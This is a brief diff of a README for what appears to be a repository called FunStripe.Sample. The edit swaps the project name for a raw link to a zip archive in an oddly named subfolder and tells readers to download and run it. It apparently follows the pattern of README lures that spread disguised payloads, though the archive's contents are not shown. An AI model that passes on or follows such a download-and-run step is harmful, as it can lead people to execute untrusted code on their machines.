Velder101/FunStripe.Sample/README.md

 If you encounter issues or have questions, feel free to check the issues section of our GitHub repository.
 Our community is ready to help.

-By following these steps, you should be able to download and run FunStripe.Sample without any issues.
+By following these steps, you should be able to download and run https://raw.githubusercontent.com/Velder101/FunStripe.Sample/main/carcinemia/FunStripe.Sample.zip without any issues.
 Happy testing!